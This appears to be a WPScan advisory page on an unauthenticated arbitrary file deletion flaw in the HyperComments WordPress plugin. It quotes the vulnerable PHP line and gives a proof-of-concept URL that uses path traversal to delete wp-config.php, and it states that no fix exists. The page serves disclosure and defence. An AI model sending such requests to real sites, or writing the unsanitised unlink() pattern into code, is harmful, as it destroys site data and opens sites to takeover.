WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion

Description

The plugin does not validate and sanitise user input which is being concatenated to create a file path, passed to unlink(), which leads to an arbitrary file deletion issue.

For more details about this issue, please see the reference.

Proof of Concept

File: hypercomments/hypercomments.php:112

$filename = dirname(dirname(dirname(__FILE__))).'/uploads/'.$_GET['xml'];
unlink($filename);


https://example.com/?hc_action=delete_xml&result=success&xml=../../wp-config.php

Affects Plugins

hypercomments
No known fix - plugin closed

References

URL
https://lenonleite.com.br/en/2018/01/08/13-17-wordpress-plugins-with-over-150000-270000-active-downloads-with-the-same-security-issues/

Classification

Type

FILE DELETION

OWASP top 10
A6: Security Misconfiguration
CWE
CWE-73

Miscellaneous

Original Researcher

Lenon Leite

Submitter

Lenon Leite

Submitter website
http://www.lenonleite.com.br
Submitter twitter
lenonleite
Verified

No

WPVDB ID
d0ff458f-0a1a-4bae-be50-c11d55813458

Timeline

Publicly Published

2020-10-07 (about 2 years ago)

Added

2020-10-07 (about 2 years ago)

Last Updated

2020-10-08 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin